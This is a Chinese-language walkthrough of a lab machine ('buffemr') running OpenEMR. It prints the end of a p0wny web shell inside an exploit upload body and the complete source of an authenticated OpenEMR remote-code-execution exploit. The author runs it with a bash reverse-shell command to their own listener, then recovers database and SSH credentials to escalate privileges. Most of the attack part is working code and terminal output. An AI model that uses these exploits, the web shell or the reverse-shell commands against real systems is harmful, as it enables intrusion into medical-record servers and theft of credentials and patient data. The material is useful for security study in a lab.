*::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_dest_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_education\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"bn_save\"\r\n\r\nSave\r\n-----------------------------31900464228840324774249185339--\r\n"
# Send Exploit:
session.post(exploit_url, headers=header, data=body)
# Finish
path = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php'
print('[+] Webshell: ' + path)
查看帮助
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# python 49998.py -h
___ _____ __ __ ____ ____ ___ _ _____
/ _ \ _ __ ___ _ __ | ____| \/ | _ \ | ___| / _ \ / | |___ /
| | | | '_ \ / _ \ '_ \| _| | |\/| | |_) | _____ |___ \| | | || | |_ | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) |
\___/| .__/ \___|_| |_|_____|_| |_|_| \_\ |____(_)___(_)_(_)____/
|_|
_____ _ _ _
| ____|_ ___ __ | | ___ (_) |_
| _| \ \/ / '_ \| |/ _ \| | __|
| |___ > <| |_) | | (_) | | |_
|_____/_/\_\ .__/|_|\___/|_|\__|
|_|
usage: 49998.py [-h] [-T IP] [-P PORT] [-U PATH] [-u USERNAME] [-p PASSWORD]
OpenEMR Remote Code Execution
options:
-h, --help show this help message and exit
-T IP, --IP IP
-P PORT, --PORT PORT
-U PATH, --PATH PATH
-u USERNAME, --USERNAME USERNAME
-p PASSWORD, --PASSWORD PASSWORD
利用参数如下
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# python 49998.py -T 192.168.11.137 -P 80 -U '/openemr' -u 'admin' -p 'Monster123'
___ _____ __ __ ____ ____ ___ _ _____
/ _ \ _ __ ___ _ __ | ____| \/ | _ \ | ___| / _ \ / | |___ /
| | | | '_ \ / _ \ '_ \| _| | |\/| | |_) | _____ |___ \| | | || | |_ | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) |
\___/| .__/ \___|_| |_|_____|_| |_|_| \_\ |____(_)___(_)_(_)____/
|_|
_____ _ _ _
| ____|_ ___ __ | | ___ (_) |_
| _| \ \/ / '_ \| |/ _ \| | __|
| |___ > <| |_) | | (_) | | |_
|_____/_/\_\ .__/|_|\___/|_|\__|
|_|
[+] Authentication
[+] Uploading Webshell:
[+] Webshell: http://192.168.11.137:80/openemr/sites/default/images/shell.php
利用失败,,,换一个试试
45161.py漏洞利用
利用最后那个RCE方式:php/webapps/45161.py
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# cp /usr/share/exploitdb/exploits/php/webapps/45161.py /home/hirak0/Vulhub/104/45161.py
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# ll
总计 16
-rwxr-xr-x 1 root root 8583 4月 4日 16:48 45161.py
drwxr-xr-x 3 root root 4096 4月 4日 15:37 share
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# cat 45161.py
# Title: OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
# Author: Cody Zacharias
# Date: 2018-08-07
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
# Version: < 5.0.1 (Patch 4)
# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
# References:
# https://www.youtube.com/watch?v=DJSQ8Pk_7hc
'''
WARNING: This proof-of-concept exploit WILL replace the GLOBAL config.
If you don't want the OpenEMR config to be reset to default, please modify
the payload.
Example Usage:
- python openemr_rce.py http://127.0.0.1/openemr-5_0_1_3 -u admin -p admin -c 'bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'
'''
#!/usr/bin/env python
import argparse
import base64
import requests
import sys
ap = argparse.ArgumentParser(description="OpenEMR RCE")
ap.add_argument("host", help="Path to OpenEMR (Example: http://127.0.0.1/openemr).")
ap.add_argument("-u", "--user", help="Admin username")
ap.add_argument("-p", "--password", help="Admin password")
ap.add_argument("-c", "--cmd", help="Command to run.")
args = ap.parse_args()
ascii = "> .---. ,---. ,---. .-. .-.,---. ,---. <\r\n"
ascii+= ">/ .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\ <\r\n"
ascii+= ">| | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/ <\r\n"
ascii+= ">| | | | | |--' | .-' | |\ || .-' (_)\/ || ( <\r\n"
ascii+= ">\ `-' / | | | `--.| | |)|| `--.| \ / || |\ \ <\r\n"
ascii+= "> )---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\ <\r\n"
ascii+= ">(_) (__) (__) (__) (__) '-' '-' (__) <\r\n"
ascii+= " \r\n"
ascii+= " ={> P R O J E C T I N S E C U R I T Y <}= \r\n"
ascii+= " \r\n"
ascii+= " Twitter : >@Insecurity< \r\n"
ascii+= " Site : >insecurity.sh< \r\n"
green = "\033[1;32m"
red = "\033[1;31m"
clear = "\033[0m"
load = "[>$<] ".replace(">", green).replace("<", clear)
err = "[>-<] ".replace(">", red).replace("<", clear)
intro = ascii.replace(">", green).replace("<", clear)
print(intro)
with requests.session() as s:
login = {"new_login_session_management": "1",
"authProvider": "Default",
"authUser": args.user,
"clearPass": args.password,
"languageChoice": "1"
}
print(load + "Authenticating with " + args.user + ":" + args.password)
r = s.post(args.host + "/interface/main/main_screen.php?auth=login&site=default", data=login)
if "login_screen.php?error=1&site=" in r.text:
print(err + "Failed to Login.")
sys.exit(0)
# This will rewrite and replace your current GLOBALS, please modify this if you don't want that.
payload = "form_save=Save&srch_desc=&form_0=main_info.php&form_1=..%2F..%2Finterface"
payload += "%2Fmain%2Fmessages%2Fmessages.php%3Fform_active%3D1&form_2=1&form_3=tabs_"
payload += "style_full.css&form_4=style_light.css&form_5=__default__&form_6=__default"
payload += "__&form_7=1&form_8=0&form_9=175&form_10=OpenEMR&form_12=1&form_13=0&form_"
payload += "14=0&form_16=1&form_21=1&form_22=1&form_23=1&form_24=1&form_25=http%3A%2F"
payload += "%2Fopen-emr.org%2F&form_26=&form_27=20&form_28=10&form_30=0&form_31=5&for"
payload += "m_32=0&form_37=English+%28Standard%29&form_38=1&form_42=1&form_43=1&form_"
payload += "44=1&form_45=1&form_46=1&form_47=1&form_48=1&form_49=1&form_50=1&form_51="
payload += "0&form_52=0&form_53=&form_54=2&form_55=.&form_56=%2C&form_57=%24&form_58="
payload += "0&form_59=3&form_60=6%2C0&form_61=0&form_62=0&form_63=_blank&form_69=1&fo"
payload += "rm_70=1&form_77=1&form_79=&form_80=&form_81=&form_84=1&form_85=1&form_87="
payload += "1&form_89=1&form_90=1&form_91=1&form_92=Y1&form_93=1&form_94=2&form_95=0&"
payload += "form_97=14&form_98=11&form_99=24&form_100=20&form_102=1&form_103=0&form_1"
payload += "04=0&form_105=ICD10&form_106=1&form_107=1&form_112=3&form_115=1&form_116="
payload += "&form_119=1.00&form_121=0&form_123=&form_125=30&form_126=&form_127=60&for"
payload += "m_128=&form_129=90&form_130=&form_131=120&form_132=&form_133=150&form_134"
payload += "=&form_135=1&form_138=1&form_139=1&form_141=1&form_142=0&form_143=localho"
payload += "st&form_144=&form_145=&form_146=5984&form_147=&form_150=Patient+ID+card&f"
payload += "orm_151=Patient+Photograph&form_152=Lab+Report&form_153=Lab+Report&form_1"
payload += "55=100&form_157=8&form_158=17&form_159=15&form_160=day&form_161=1&form_16"
payload += "2=2&form_163=1&form_164=10&form_165=10&form_166=15&form_167=20&form_168=1"
payload += "&form_169=%23FFFFFF&form_170=%23E6E6FF&form_171=%23E6FFE6&form_172=%23FFE"
payload += "6FF&form_173=1&form_174=0&form_176=1&form_177=1&form_178=1&form_181=1&for"
payload += "m_182=1&form_183=1&form_184=1&form_185=D0&form_186=D0&form_187=0%3A20&for"
payload += "m_188=0&form_190=33&form_191=0&form_194=7200&form_198=1&form_199=0&form_2"
payload += "00=0&form_202=&form_203=&form_204=365&form_205=&form_206=1&form_208=&form"
payload += "_210=&form_211=&form_212=&form_213=&form_214=&form_215=&form_216=SMTP&for"
payload += "m_217=localhost&form_218=25&form_219=&form_220=&form_221=&form_222=50&for"
payload += "m_223=50&form_224=&form_225=&form_226=&form_227=50&form_228=&form_229=&fo"
payload += "rm_230=&form_231=1&form_232=1&form_233=1&form_234=1&form_235=1&form_236=1"
payload += "&form_237=1&form_238=1&form_239=Model+Registry&form_240=125789123&form_24"
payload += "1=1&form_242=1&form_243=1&form_244=&form_245=&form_246=1&form_247=1&form_"
payload += "248=1&form_249=5&form_250=1&form_252=1&form_253=1&form_254=1&form_255=1&f"
payload += "orm_256=1&form_257=1&form_258=1&form_262=&form_263=6514&form_264=&form_26"
payload += "5=&form_267=1&form_268=0&form_269=%2Fusr%2Fbin&form_270=%2Fusr%2Fbin&form"
payload += "_271=%2Ftmp&form_272=%2Ftmp&form_273=26&form_274=state&form_275=1&form_27"
payload += "6=26&form_277=country&form_278=lpr+-P+HPLaserjet6P+-o+cpi%3D10+-o+lpi%3D6"
payload += "+-o+page-left%3D72+-o+page-top%3D72&form_279=&form_280=&form_282=2018-07-"
payload += "23&form_283=1&form_285=%2Fvar%2Fspool%2Fhylafax&form_286=enscript+-M+Lett"
payload += "er+-B+-e%5E+--margins%3D36%3A36%3A36%3A36&form_288=%2Fmnt%2Fscan_docs&for"
payload += "m_290=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fportal&form_292=1&form_"
payload += "296=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fpatients&form_297=1&form_"
payload += "299=&form_300=&form_301=&form_302=https%3A%2F%2Fssh.mydocsportal.com%2Fpr"
payload += "ovider.php&form_303=https%3A%2F%2Fssh.mydocsportal.com&form_305=https%3A%"
payload += "2F%2Fyour_cms_site.com%2F&form_306=&form_307=&form_308=0&form_309=https%3"
payload += "A%2F%2Fhapi.fhir.org%2FbaseDstu3%2F&form_312=https%3A%2F%2Fsecure.newcrop"
payload += "accounts.com%2FInterfaceV7%2FRxEntry.aspx&form_313=https%3A%2F%2Fsecure.n"
payload += "ewcropaccounts.com%2Fv7%2FWebServices%2FUpdate1.asmx%3FWSDL%3Bhttps%3A%2F"
payload += "%2Fsecure.newcropaccounts.com%2Fv7%2FWebServices%2FPatient.asmx%3FWSDL&fo"
payload += "rm_314=21600&form_315=21600&form_316=&form_317=&form_318=&form_319=1&form"
payload += "_324=&form_325=0&form_327=137&form_328=7C84773D5063B20BC9E41636A091C6F17E"
payload += "9C1E34&form_329=C36275&form_330=0&form_332=https%3A%2F%2Fphimail.example."
payload += "com%3A32541&form_333=&form_334=&form_335=admin&form_336=5&form_339=1&form"
payload += "_346=LETTER&form_347=30&form_348=30&form_349=72&form_350=30&form_351=P&fo"
payload += "rm_352=en&form_353=LETTER&form_354=5&form_355=5&form_356=5&form_357=8&for"
payload += "m_358=D&form_359=1&form_360=9&form_361=1&form_362=104.775&form_363=241.3&"
payload += "form_364=14&form_365=65&form_366=220"
p = {}
for c in payload.replace("&", "\n").splitlines():
a = c.split("=")
p.update({a[0]: a[1]})
# Linux only, but can be easily modified for Windows.
_cmd = "|| echo " + base64.b64encode(args.cmd) + "|base64 -d|bash"
p.update({"form_284": _cmd})
print(load + "Injecting payload")
s.post(args.host + "/interface/super/edit_globals.php", data=p)
sp = s.get(args.host + "/interface/main/daemon_frame.php") # M4tt D4em0n w0z h3r3 ;PpPpp
if sp.status_code == 200:
print(load + "Payload executed")
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# python 45161.py
usage: 45161.py [-h] [-u USER] [-p PASSWORD] [-c CMD] host
45161.py: error: the following arguments are required: host
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# python 45161.py -h
usage: 45161.py [-h] [-u USER] [-p PASSWORD] [-c CMD] host
OpenEMR RCE
positional arguments:
host Path to OpenEMR (Example: http://127.0.0.1/openemr).
options:
-h, --help show this help message and exit
-u USER, --user USER Admin username
-p PASSWORD, --password PASSWORD
Admin password
-c CMD, --cmd CMD Command to run.
这里使用参数如下,注意使用python2
python2 45161.py http://192.168.11.137/openemr -u admin -p Monster123 -c 'bash -i >& /dev/tcp/192.168.11.130/6666 0>&1'
同时kali上监听6666端口
nc -lvvp 6666
2.4 权限提升
2.4.1 提权至buffemr
信息收集一波,先升级一下TTY
www-data@buffemr:/var/www/html/openemr/interface/main$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ain$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@buffemr:/var/www/html/openemr/interface/main$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@buffemr:/var/www/html/openemr/interface/main$ cd /h
cd /home/
www-data@buffemr:/home$ ls
ls
buffemr
www-data@buffemr:/home$ cd buffemr
cd buffemr
bash: cd: buffemr: Permission denied
这个账户的权限太低了,得想办法先提权到buffemr再提权到root
挨个目录先看看,哪些目录有权限进去
先看看tmp有什么临时文件
www-data@buffemr:/$ ls tmp/
ls tmp/
wrtFdHflK wrtmf8FWf
www-data@buffemr:/$ cat tmp/wrtFdHflK
cat tmp/wrtFdHflK
<?php /* Smarty version 2.6.31, created on 2024-04-04 04:06:12
compiled from default/views/day/default.html */ ?>
<?php if ($this->_tpl_vars['PRINT_VIEW'] == 1): ?>
<?php $_smarty_tpl_vars = $this->_tpl_vars;
$this->_smarty_include(array('smarty_include_tpl_file' => ($this->_tpl_vars['TPL_NAME'])."/views/day_print/outlook_ajax_template.html", 'smarty_include_vars' => array()));
$this->_tpl_vars = $_smarty_tpl_vars;
unset($_smarty_tpl_vars);
?>
<?php else: ?>
<?php $_smarty_tpl_vars = $this->_tpl_vars;
$this->_smarty_include(array('smarty_include_tpl_file' => ($this->_tpl_vars['TPL_NAME'])."/views/day/ajax_template.html", 'smarty_include_vars' => array()));
$this->_tpl_vars = $_smarty_tpl_vars;
unset($_smarty_tpl_vars);
?>
<?php endif; ?>www-data@buffemr:/$
www-data@buffemr:/$ cat tmp/wrtmf8FWf
cat tmp/wrtmf8FWf
<?php /* Smarty version 2.6.31, created on 2024-04-04 04:10:07
compiled from default/views/day/default.html */ ?>
<?php if ($this->_tpl_vars['PRINT_VIEW'] == 1): ?>
<?php $_smarty_tpl_vars = $this->_tpl_vars;
$this->_smarty_include(array('smarty_include_tpl_file' => ($this->_tpl_vars['TPL_NAME'])."/views/day_print/outlook_ajax_template.html", 'smarty_include_vars' => array()));
$this->_tpl_vars = $_smarty_tpl_vars;
unset($_smarty_tpl_vars);
?>
<?php else: ?>
<?php $_smarty_tpl_vars = $this->_tpl_vars;
$this->_smarty_include(array('smarty_include_tpl_file' => ($this->_tpl_vars['TPL_NAME'])."/views/day/ajax_template.html", 'smarty_include_vars' => array()));
$this->_tpl_vars = $_smarty_tpl_vars;
unset($_smarty_tpl_vars);
?>
<?php endif; ?>www-data@buffemr:/$
再看看var目录下
www-data@buffemr:/$ ls var/
ls var/
backups crash local log metrics run spool user.zip
cache lib lock mail opt snap tmp www
该目录有一个user.zip,下载下来看看
www-data@buffemr:/$ python3 -m http.server 8888
python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.11.130 - - [04/Apr/2024 05:15:50] code 404, message File not found
192.168.11.130 - - [04/Apr/2024 05:15:50] "GET /user.zip HTTP/1.1" 404 -
192.168.11.130 - - [04/Apr/2024 05:16:27] "GET /var/user.zip HTTP/1.1" 200 -
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# wget http://192.168.11.137:8888/var/user.zip
--2024-04-04 17:16:29-- http://192.168.11.137:8888/var/user.zip
正在连接 192.168.11.137:8888... 已连接。已发出 HTTP 请求,正在等待回应... 200 OK
长度:309 [application/zip]
正在保存至: “user.zip”
user.zip 100%[==============================================================================================================>] 309 --.-KB/s 用时 0.008s
2024-04-04 17:16:29 (36.6 KB/s) - 已保存 “user.zip” [309/309])
解压发现需要密码
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# unzip user.zip
Archive: user.zip
[user.zip] user.lst password:
用fcrackzip工具爆破一下看看
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u user.zip
换个思路,看看监听端口,发现3306是开着的
那咱们可以试着登录一下看看,刚好前边拿到账户密码了
$host = 'localhost';
$port = '3306';
$login = 'openemruser';
$pass = 'openemruser123456';
$dbase = 'openemr';
www-data@buffemr:/$ mysql -uopenemruser -popenemruser123456
mysql -uopenemruser -popenemruser123456
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 845
Server version: 5.7.34-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| openemr |
| user_info |
+--------------------+
3 rows in set (0.01 sec)
mysql> use user_info;
use user_info;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+---------------------+
| Tables_in_user_info |
+---------------------+
| ENCKEYS |
+---------------------+
1 row in set (0.00 sec)
mysql> select * from ENCKEYS;
select * from ENCKEYS;
+------+--------+----------------------+
| id | name | ENC |
+------+--------+----------------------+
| 1 | pdfkey | c2FuM25jcnlwdDNkCg== |
+------+--------+----------------------+
1 row in set (0.01 sec)
这里拿到一个pdfkey为c2FuM25jcnlwdDNkCg==
看着像是base64编码后的字符串,这里解码一下得到san3ncrypt3d
拿去解压user.zip发现解密失败
拿去ssh登录一下看看,也失败了,,
拿原值去解压一下user.zip试试
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# unzip user.zip
Archive: user.zip
[user.zip] user.lst password:
inflating: user.lst
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# cat user.lst
This file contain senstive information, therefore, should be always encrypted at rest.
buffemr - Iamgr00t
****** Only I can SSH in ************
感情我多此一举了,不需要解码,直接就拿来用,,,,
这里成功拿到buffemr - Iamgr00t
──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# ssh buffemr@192.168.11.137
buffemr@192.168.11.137's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
81 packages can be updated.
1 update is a security update.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Thu Jun 24 10:01:00 2021 from 10.0.0.154
buffemr@buffemr:~$
2.4.2 提权至root
成功登录buffemr,先做一波信息收集
buffemr@buffemr:~$ id
uid=1000(buffemr) gid=1000(buffemr) groups=1000(buffemr),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
buffemr@buffemr:~$ ls
Desktop Documents Downloads examples.desktop Music Pictures Public Templates user_flag.txt Videos
buffemr@buffemr:~$ cat user_flag.txt
.-. )) wWw \\\ /// wWw \\\ ///()_()
c(O_O)c (o0)-. (O)_((O)(O)) (O)_((O) (O))(O o)
,'.---.`, | (_))/ __)| \ || / __)| \ / | |^_\
/ /|_|_|\ \| .-'/ ( ||\\|| / ( ||\\//|| |(_))
| \_____/ ||( ( _) || \ | ( _) || \/ || | /
'. `---' .` \) \ \_ || || \ \_ || || )|\\
`-...-' ( \__)(_/ \_) \__)(_/ \_)(/ \)
wWw wWw oo_ wWw ()_() c c .-. \\\ /// )) ()_() .-. \\\ ///wW Ww oo_ wWw _
(O) (O) / _)-< (O)_(O o) (OO) c(O_O)c ((O) (O))(o0)-.(O o) c(O_O)c ((O) (O))(O)(O)/ _)-< (O)_/||_
/ ) ( \ \__ `. / __)|^_\ ,'.--.) ,'.---.`, | \ / | | (_))|^_\ ,'.---.`, | \ / | (..) \__ `. / __)/o_)
/ / \ \ `. | / ( |(_)) / //_|_\/ /|_|_|\ \||\\//|| | .-' |(_))/ /|_|_|\ \||\\//|| || `. | / ( / |(\
| \____/ | _| |( _) | / | \___ | \_____/ ||| \/ || |( | / | \_____/ ||| \/ || _||_ _| |( _) | | ))
'. `--' .`,-' | \ \_ )|\\ '. ) '. `---' .`|| || \) )|\\ '. `---' .`|| || (_/\_),-' | \ \_ | |//
`-..-' (_..--' \__)(/ \) `-.' `-...-' (_/ \_) ( (/ \) `-...-' (_/ \_) (_..--' \__)\__/
